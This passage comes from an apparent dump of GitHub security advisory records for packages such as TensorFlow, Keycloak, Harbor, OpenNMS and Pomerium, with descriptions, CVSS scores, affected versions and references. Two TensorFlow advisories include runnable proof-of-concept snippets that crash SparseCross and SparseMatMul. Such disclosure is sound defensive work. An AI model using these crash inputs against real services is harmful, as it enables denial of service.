'https://lists.apache.org/thread.html/r8d35eeb9a470d2682b5bcf3be0b8942faa7e28f9ca5861c058d17fff@%3Coak-issues.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9c4ce6903218c92ef2583070e64af5a69e483821c4b3016dc41e3c6f@%3Coak-issues.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6db683903174eaa44ec80cc118a38574319b0d4181f36b61ee6278f@%3Cdev.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc680cbfd745f22d182158217428a296e8e398cde16f3f428fe4bddc@%3Coak-issues.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd85f87e559ee27e9c69795e3ad93a77621895e0328ea3df41d711d72@%3Coak-commits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ref84e60192f4bdc3206b247f260513e8d4e71f3e200792f75386d07a@%3Cdev.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0009/'}]","{'cwe_ids': ['CWE-279', 'CWE-522'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T16:46:48Z', 'nvd_published_at': '2021-04-13T07:15:00Z'}" +1.4.0,GHSA-pf2j-9qmp-jqr2,2022-08-11T14:59:34Z,2021-05-07T16:46:42Z,,['CVE-2020-8158'],TypeORM vulnerable to MAID and Prototype Pollution,Prototype pollution vulnerability in the TypeORM package < 0.2.25 may allow attackers to add or modify Object properties leading to further denial of service or SQL injection attacks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'typeorm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.25'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8158'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/869574'}]","{'cwe_ids': ['CWE-1321', 'CWE-471'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T17:29:12Z', 'nvd_published_at': '2020-09-18T21:15:00Z'}" +1.4.0,GHSA-2mq8-99q7-55wx,2021-03-24T23:54:00Z,2021-05-13T22:29:51Z,,['CVE-2021-20222'],Code injection in keycloak,A flaw was found in keycloak. The new account console in keycloak can allow malicious code to be executed using the referrer URL. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '12.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20222'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/3b80eee5bfdf2b80c47465c0f2eaf70074808741'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2021-20222'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1924606'}]","{'cwe_ids': ['CWE-20', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:54:00Z', 'nvd_published_at': '2021-03-23T17:15:00Z'}" +1.4.0,GHSA-5796-p3m6-9qj4,2023-02-07T18:23:16Z,2021-05-18T15:31:39Z,,['CVE-2019-11289'],Cloud Foundry Routing Improper Input Validation vulnerability,"Cloud Foundry Routing, all versions before 0.0.0-20191101214924-b1b5c44e050f, does not properly validate nonce input. A remote unauthorized malicious user could forge a route service request using an invalid nonce that will cause the Gorouter to crash.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'code.cloudfoundry.org/gorouter'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20191101214924-b1b5c44e050f'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cloudfoundry/gorouter'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20191101214924-b1b5c44e050f'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11289'}, {'type': 'WEB', 'url': 'https://github.com/cloudfoundry/gorouter/commit/b1b5c44e050f73b399b379ca63a42a2c5780a83f'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudfoundry/gorouter'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0102'}, {'type': 'WEB', 'url': 'https://www.cloudfoundry.org/blog/cve-2019-11289'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:24:54Z', 'nvd_published_at': None}" +1.4.0,GHSA-rffr-c932-cpxv,2021-05-04T22:01:58Z,2021-05-18T18:27:50Z,,['CVE-2019-19025'],Cross-site Request Forgery (CSRF) in Cloud Native Computing Foundation Harbor,Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows CSRF in the VMware Harbor Container Registry for the Pivotal Platform.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.8.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19025'}, {'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2019-19025'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:01:58Z', 'nvd_published_at': '2020-03-20T03:15:00Z'}" +1.4.0,GHSA-72mh-269x-7mh5,2021-05-20T21:59:29Z,2021-05-24T19:52:55Z,,['CVE-2021-31597'],Improper Certificate Validation in xmlhttprequest-ssl,"The xmlhttprequest-ssl package before 1.6.1 for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'xmlhttprequest-ssl'}, 'ecosystem_specific': {'affected_functions': ['xmlhttprequest-ssl.XMLHttpRequest']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31597'}, {'type': 'WEB', 'url': 'https://github.com/mjwwit/node-XMLHttpRequest/commit/bf53329b61ca6afc5d28f6b8d2dc2e3ca740a9b2'}, {'type': 'WEB', 'url': 'https://github.com/mjwwit/node-XMLHttpRequest/compare/v1.6.0...1.6.1'}, {'type': 'WEB', 'url': 'https://people.kingsds.network/wesgarland/xmlhttprequest-ssl-vuln.txt'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210618-0004/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:59:29Z', 'nvd_published_at': '2021-04-23T00:15:00Z'}" +1.4.0,GHSA-2rq5-68hm-h4j8,2021-05-28T22:26:41Z,2021-05-25T18:46:55Z,,['CVE-2021-25931'],Cross-Site Request Forgery in OpenNMS Horizon,"In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection at `/opennms/admin/userGroupView/users/updateUser`. This flaw allows assigning `ROLE_ADMIN` security role to a normal user. Using this flaw, an attacker can trick the admin user to assign administrator privileges to a normal user by enticing him to click upon an attacker-controlled website.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '27.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25931'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/607151ea8f90212a3fb37c977fa57c7d58d26a84'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25931'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T17:28:35Z', 'nvd_published_at': '2021-05-20T15:15:00Z'}" +1.4.0,GHSA-jf7h-7m85-w2v2,2021-05-17T22:25:58Z,2021-05-21T14:28:22Z,,['CVE-2021-29605'],Integer overflow in TFLite memory allocation,"### Impact +The TFLite code for allocating `TFLiteIntArray`s is [vulnerable to an integer overflow issue](https://github.com/tensorflow/tensorflow/blob/4ceffae632721e52bf3501b736e4fe9d1221cdfa/tensorflow/lite/c/common.c#L24-L27): + +```cc +int TfLiteIntArrayGetSizeInBytes(int size) { + static TfLiteIntArray dummy; + return sizeof(dummy) + sizeof(dummy.data[0]) * size; +} +``` + +An attacker can craft a model such that the `size` multiplier is so large that the return value overflows the `int` datatype and becomes negative. In turn, this results in [invalid value being given to `malloc`](https://github.com/tensorflow/tensorflow/blob/4ceffae632721e52bf3501b736e4fe9d1221cdfa/tensorflow/lite/c/common.c#L47-L52): + +```cc +TfLiteIntArray* TfLiteIntArrayCreate(int size) { + TfLiteIntArray* ret = (TfLiteIntArray*)malloc(TfLiteIntArrayGetSizeInBytes(size)); + ret->size = size; + return ret; +} +``` + +In this case, `ret->size` would dereference an invalid pointer. + +### Patches +We have patched the issue in GitHub commit [7c8cc4ec69cd348e44ad6a2699057ca88faad3e5](https://github.com/tensorflow/tensorflow/commit/7c8cc4ec69cd348e44ad6a2699057ca88faad3e5). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-jf7h-7m85-w2v2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29605'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7c8cc4ec69cd348e44ad6a2699057ca88faad3e5'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:25:58Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-cv7m-wc7g-7gfp,2021-05-05T19:10:44Z,2021-05-06T18:54:41Z,,['CVE-2020-5776'],Cross-Site Request Forgery in MAGMI,All versions of MAGMI up to and including version 0.7.24 are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dweeves/magmi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5776'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/research/tra-2020-51'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:10:44Z', 'nvd_published_at': '2020-09-01T21:15:00Z'}" +1.4.0,GHSA-4pv3-63jw-4jw2,2022-10-07T20:41:22Z,2021-05-07T15:53:40Z,,['CVE-2020-9489'],Missing Release of Memory after Effective Lifetime in Apache Tika,"A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 as part of the 1.24.1 release.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tika:tika'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.24.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.24'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9489'}, {'type': 'WEB', 'url': 'https://github.com/apache/tika/commit/0f4d5de0f85455e91433fb0b464ea0461d7c891d'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tika'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/TIKA-3081'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4d943777e36ca3aa6305a45da5acccc54ad894f2d5a07186cfa2442c%40%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-401', 'CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:53:02Z', 'nvd_published_at': '2020-04-27T14:15:00Z'}" +1.4.0,GHSA-772j-h9xw-ffp5,2021-05-18T23:29:36Z,2021-05-21T14:21:08Z,,['CVE-2021-29519'],CHECK-fail in SparseCross due to type confusion,"### Impact +The API of `tf.raw_ops.SparseCross` allows combinations which would result in a `CHECK`-failure and denial of service: + +```python +import tensorflow as tf + +hashed_output = False +num_buckets = 1949315406 +hash_key = 1869835877 +out_type = tf.string +internal_type = tf.string + +indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) +indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) +indices = [indices_1, indices_2] + +values_1 = tf.constant([0], dtype=tf.int64) +values_2 = tf.constant([72], dtype=tf.int64) +values = [values_1, values_2] + +batch_size = 4 +shape_1 = tf.constant([4, 122], dtype=tf.int64) +shape_2 = tf.constant([4, 188], dtype=tf.int64) +shapes = [shape_1, shape_2] + +dense_1 = tf.constant([188, 127, 336, 0], shape=[4, 1], dtype=tf.int64) +dense_2 = tf.constant([341, 470, 470, 470], shape=[4, 1], dtype=tf.int64) +dense_3 = tf.constant([188, 188, 341, 922], shape=[4, 1], dtype=tf.int64) +denses = [dense_1, dense_2, dense_3] + +tf.raw_ops.SparseCross(indices=indices, values=values, shapes=shapes, dense_inputs=denses, hashed_output=hashed_output, + num_buckets=num_buckets, hash_key=hash_key, out_type=out_type, internal_type=internal_type) +``` + +The above code will result in a `CHECK` fail in [`tensor.cc`](https://github.com/tensorflow/tensorflow/blob/3d782b7d47b1bf2ed32bd4a246d6d6cadc4c903d/tensorflow/core/framework/tensor.cc#L670-L675): + +```cc +void Tensor::CheckTypeAndIsAligned(DataType expected_dtype) const { + CHECK_EQ(dtype(), expected_dtype) + << "" "" << DataTypeString(expected_dtype) << "" expected, got "" + << DataTypeString(dtype()); + ... +} +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/3d782b7d47b1bf2ed32bd4a246d6d6cadc4c903d/tensorflow/core/kernels/sparse_cross_op.cc#L114-L116) is tricked to consider a tensor of type `tstring` which in fact contains integral elements: + +```cc + if (DT_STRING == values_.dtype()) + return Fingerprint64(values_.vec().data()[start + n]); + return values_.vec().data()[start + n]; +``` + +Fixing the type confusion by preventing mixing `DT_STRING` and `DT_INT64` types solves this issue. + +### Patches +We have patched the issue in GitHub commit [b1cc5e5a50e7cee09f2c6eb48eb40ee9c4125025](https://github.com/tensorflow/tensorflow/commit/b1cc5e5a50e7cee09f2c6eb48eb40ee9c4125025). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-772j-h9xw-ffp5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29519'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b1cc5e5a50e7cee09f2c6eb48eb40ee9c4125025'}]","{'cwe_ids': ['CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:29:36Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-35vc-w93w-75c2,2021-05-20T20:25:40Z,2021-05-21T16:24:34Z,,['CVE-2021-29651'],JWT leak via Open Redirect in Programmatic access,"### Impact +Using programmatic access on protected sites, one can get a signed login URL with pomerium_redirect_uri set to an arbitrary URL. Then, if the user has already logged into Pomerium, they will be redirected to the specified pomerium_redirect_uri with a JWT attached. This allows an outside attacker to get a signed login URL that, upon visiting it, will redirect a victim to the attacker’s site. This creates an issue of Open Redirect and, more seriously, JWT leakage. + +With a leaked JWT, the attacker will be able to unveil the victim’s identity (.e.g. email address) by supplying the JWT to the authenticate service or verify.pomerium.com. In addition, if an application integrating Pomerium only verifies the iss claim and others but not the aud claim, the attacker will be able to access it as the victim. + +### Patches +Patched in Pomerium v0.13.4 + +### For more information +If you have any questions or comments about this advisory +* Open an issue in [pomerium](http://github.com/pomerium/pomerium) +* Email us at [security@pomerium.com](mailto:security@pomerium.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium/proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/security/advisories/GHSA-35vc-w93w-75c2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29651'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/pull/2049'}]","{'cwe_ids': ['CWE-200', 'CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:25:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-hcq6-h8v2-r5wm,2021-04-21T20:52:05Z,2021-05-10T18:38:34Z,,['CVE-2020-7740'],Server-Side Request Forgery in node-pdf-generator,"This affects all versions of package node-pdf-generator up to and including 0.0.6. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-pdf-generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7740'}, {'type': 'WEB', 'url': 'https://github.com/darrenhaken/node-pdf-generator/blob/master/index.js%23L29'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEPDFGENERATOR-609636'}]","{'cwe_ids': ['CWE-20', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T20:52:05Z', 'nvd_published_at': '2020-10-06T18:15:00Z'}" +1.4.0,GHSA-xw93-v57j-fcgh,2021-05-18T20:40:17Z,2021-05-21T14:24:48Z,,['CVE-2021-29557'],Division by 0 in `SparseMatMul`,"### Impact +An attacker can cause a denial of service via a FPE runtime error in `tf.raw_ops.SparseMatMul`: + +```python +import tensorflow as tf + +a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) +b = tf.constant([], shape=[0, 2], dtype=tf.float32) + +tf.raw_ops.SparseMatMul( + a=a, b=b, transpose_a=True, transpose_b=True, + a_is_sparse=True, b_is_sparse=True) +``` + +The division by 0 occurs deep in Eigen code because the `b` tensor is empty. + +### Patches +We have patched the issue in GitHub commit [7f283ff806b2031f407db64c4d3edcda8fb9f9f5](https://github.com/tensorflow/tensorflow/commit/7f283ff806b2031f407db64c4d3edcda8fb9f9f5). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xw93-v57j-fcgh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29557'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7f283ff806b2031f407db64c4d3edcda8fb9f9f5'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': 